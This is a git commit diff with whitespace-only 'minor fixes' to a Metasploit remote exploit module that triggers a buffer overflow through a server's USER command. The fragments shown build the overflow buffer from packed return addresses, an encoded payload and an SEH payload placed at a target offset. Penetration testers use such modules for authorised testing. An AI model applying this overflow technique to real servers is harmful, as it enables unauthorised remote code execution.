Minor fixes
parent
30a3d8bb96
commit
20f0a58c6a
|
@ -6,7 +6,7 @@
|
|||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -27,10 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module uses the USER command to trigger the overflow.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
[
|
||||
'hdm', # Original author
|
||||
'otr' # Windows XP SP3
|
||||
],
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
@ -123,8 +123,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf << [ target['Ret'] ].pack('V') * 2
|
||||
buf << payload.encoded
|
||||
else
|
||||
buf = rand_text_english(2048, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf = rand_text_english(2048, payload_badchars)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
buf[target['Offset'], seh.length] = seh
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue